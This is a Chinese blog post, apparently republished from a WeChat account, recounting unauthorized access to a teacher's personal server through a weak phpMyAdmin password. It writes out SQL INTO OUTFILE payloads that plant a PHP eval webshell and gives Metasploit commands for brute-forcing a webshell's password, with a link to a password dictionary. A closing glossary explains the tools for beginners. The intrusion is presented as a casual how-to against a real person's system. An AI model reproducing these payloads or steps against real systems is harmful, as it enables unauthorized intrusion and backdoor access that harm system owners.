专栏首页农夫安全啥?Metasploit里面也有菜刀~~~

啥?Metasploit里面也有菜刀~~~

利用msf破解一句话木马

0x01 前言

本文为智者楚轩原创文章

事情要从下午说起,同学突然叫我说,xxx,我扫到一个老师在电脑上自己搭建的服务器,上面有他c盘appserv的一些文件。还用弱口令进入了他的phpmyadmin。一听到这个我兴趣就来了。

当时我也进入了那个老师搭建的本机服务器。因为现在已经是深夜,老师早已回家,所以暂时没法找实体的图,我就从qq群里找记录给大家分享一下。这里是当时同学分享出来的老师自己电脑的服务器地址。

我随便翻了一下。有很多老师搭建的试验环境。这是当时发群里的图。

0x02 正文

这里面有很多很多试验环境,我推测是老师在本机上搭建了一个这样的环境,至于是怎么知道是老师的,是因为在phpmyadmin里面的用户看到了某老师的名字。

当时尝试了phpmyadmin里面执行sql上马,想通过sql上马需要满足两个条件,1.root权限,2.得知绝对路径。代码为

SELECT '<?php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.php';

但是我发现一个问题,上传php后缀直接sql报错。

然后上传txt后缀的这种可直接访

SELECT '123' INTO OUTFILE 'C:/AppServ/www/f.txt';

但是上传txt后缀的,又是一句话木马的内容的,

SELECT '<?php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.txt';

上传之后sql显示成功,但是访问直接404,我推测是被360杀了。因为我在本机上有时候弄个小马啥的都会被360直接隔离。

所以这条路行不通了,此时我逛到了如上图所示的织梦cms那里,想起可以上马,然后那个时候下午六点了,就和同学出去吃饭了,回来的时候老师的笔记本移动服务器已经不在了,估计老师应该回家了。现在想起来sql都不能上马被360杀这个肯定也不行。

好了现在深夜四点我也不是那种不要命的学习的那种,刚十二点就睡了,但是室友各种打dnf吵,一会就说一句话一会又说一句话深感绝望,于是起来学习。看某大佬给我的农夫安全团队的大佬录制的视频,正好看到了一个用msf破解一句话木马的密码的视频。然后想起来今天老师的服务器根目录下面有一个2.php,点开之后啥都没有,我当时推测是一个php木马。然后我用菜刀试了几个我常用的密码,发现都不对。刚刚看到了那个视频讲了一下如何使用msf破解菜刀密码。但是有一点点小的瑕疵,我就补充一丢丢。

首先我用我的电脑复现一下当时老师服务器的情况

这个是我自己的ip地址,当时老师的差不多也是这样,没关目录遍历。然后点开1.php一片空白。

此时用kali开msf,输入search caidao(ps:这个也是我刚刚看农夫安全的视频看到的,在之前从来都不知道msf竟然还有菜刀的模块,国际和中国接轨,感觉很神奇。)

然后老套路,

use auxiliary/scanner/http/caidao_bruteforce_login

还是show options一下

这个时候set rhost 目标ip

set targeturl /木马名

基本的设置就好了,但是注意看这里,他原本的字典是一个啥啥啥unix字典,总之破解率很低,我看了看字典内容,可能里面的密码偏向国外的环境。像国内的环境啊啥的和国外区别很大,比如我经常用cmd,hacker之类的做密码,晚上的时候又问了一个学弟他常用的一句话密码是多少,学弟说c,a,b之类的,那个字典里没有这些。

然后图里我是换了一个字典,这个字典也是那位大佬发给我的,里面有很多的常用webshell密码。我看了一下我和学弟常用的一句话密码都在里面。密码字典见附件。

然后

set PASS_FILE /你的路径/字典名.txt 此时run一下。

这个字典是真的强大。我换了好几个密码字典都可以成功。

本来这个文章到这里就结束了,但是我因为在看很多大佬的文章的时候很多都看不懂,因为涉及到很多专业名词都不懂,所以给一些还没入门的老哥来个我这个文章的一些新手普及,仔细看看这些知识应该能看懂这个文章。

appserv

appserv是一个服务器的集成环境,直接网上搜索下载然后搜索下载安装教程安装即可,这个是apache,php,mysql组成的,可以把你写的静态网页放在appserv的www目录下,改名为index.html(这个是默认访问,假如你访问一个网站,一般来说他默认的就是访问这个页面),然后通过localhost:端口号,127.0.0.1:端口号,ip:端口号,三种方式皆可访问到你的页面。

phpmyadmin

这个是管理mysql的工具,这个一两句话也说不清楚,如果不懂mysql的话肯定没法学安全的,如果不懂这个的话建议大家去学html和php+mysql,建议就是会mysql的基本语法,了解mysql是干啥的,了解php是如何调用mysql的,就差不多了,深入一点的话可以自己学习开发一个基本功能的cms,这些教程网上有很多,大家可以去各种论坛搜索。

msf

是metasploit,他是一个非常非常非常强大的集成渗透环境。下载kali linux,在这之前建议你学习一下linux基础,这个metasploit里面有很多很多集成的工具,非常傻瓜式,熟悉一下常用的用法可以通杀很多漏洞。

菜刀

菜刀这个东西我以前刚用的时候不知道用法就瞎搞,相信很多新手刚学的时候也有我一样的问题,就是传上去一个木马,比如我在xx.com.cn/xx/yy/upload.php这里上传了一个木马,然后我开菜刀。直接去连xx.com.cn。。。。。。。然后当时也是不懂就瞎搞,菜刀这个东西必须要找到你上传的木马的路径,就是举个例子xx.com.cn/xx/yy/zz/upload/1.php,然后你开菜刀直接把url输入进去,然后输入木马的密码,就可以了,木马的密码实际上是一个变量,大家可以试试手动搞,把POST改为GET,然后在访问木马的时候加上?你的密码="phpinfo()";学了php就知道一句话木马其实就是接收一个变量。

字典

字典一般用来暴力破解的 ,所谓暴力破解,我直接举个例子,假如你的密码是123456,然后我从000001,000002,000003,000004,000005.......123456,就可以破解出你的密码了。字典暴力破解也是同理,通过很多常见的密码去一个一个的试密码是否正确,不过这些都是由程序完成的。

突然发现字典不能传这里,我留个百度云链接吧。

链接:https://pan.baidu.com/s/1pKO3cT1 密码:q3dh

本文分享自微信公众号 - 网络安全社区悦信安(yuexin_an),作者:智者楚轩

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-12-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 代码审计入门总结

    0x00 简介 ---- 之前看了seay写的PHP代码审计的书,全部浏览了一遍,作为一个代码审计小白,希望向一些和我一样的小白的人提供一下我的收获,以及一个整...

    用户1467662
  • 新鲜出炉某"虚拟币"通用程序GetShell,"真香"

    用户1467662
  • 【干货】骚姿势破解后台管理员密码

    骚姿势破解后台管理员密码 0x01 前言 该文为admin原创文章 当你某个时候通过注入得到了admin的密码,然后把他放到md5解密的时候,激动不已的等待着结...

    用户1467662
  • 工具开发|Burp插件Unexpected_information

    最近写了一个BurpSuite Extensions用来标记请求包中的一些敏感信息、JS接口和一些特殊字段,防止我们疏忽了一些数据包,我将它命名为“Unexpe...

    Timeline Sec
  • PHP中命名空间的使用例子

    程序语言中的命名空间指的是一种特殊的作用域,它包含处于该作用域下的标识符,同时它本身也是一种标识符。可以把命名空间与操作系统的目录对应起来。一个命名空间相当于一...

    砸漏
  • DM 达梦数据库 主ASM磁盘组不能删除 的推测

    查看了下官方文档,没有相关信息,但从 v$asmgroup的查询结果,我们可以大胆做一个推测:<font color=red>这里所谓的主ASM磁盘组,应该就是...

    用户2465911
  • upload-labs第一关

    那再上传一个php文件试试。提示不行,只能上传jpg、png、gif类型的文件,说明这一关考的是限制文件上传的类型

    宸寰客
  • Linux中的NFS挂载问题

    Linux中的NFS挂载问题 在Linux环境中,如果你经常进行mysql的数据备份,可能会遇到备份机挂载在线上环境的问题,今天我们说说NFS备份机目录...

    AsiaYe
  • CEF -version 3325完整编译教程

    http://blog.csdn.net/baidu_32237719/article/details/79509819(3239 版本编译)

    franket
  • Java学习视频教程一网打尽

    对于自学Java的初学者来说,一定会非常希望有个大神带你一步一步由浅入深系统的学习Java知识,绕过所有的坑,那么跟着视频教程学肯定是最好的途径了。 本文汇总j...

    谭庆波

扫码关注云+社区

领取腾讯云代金券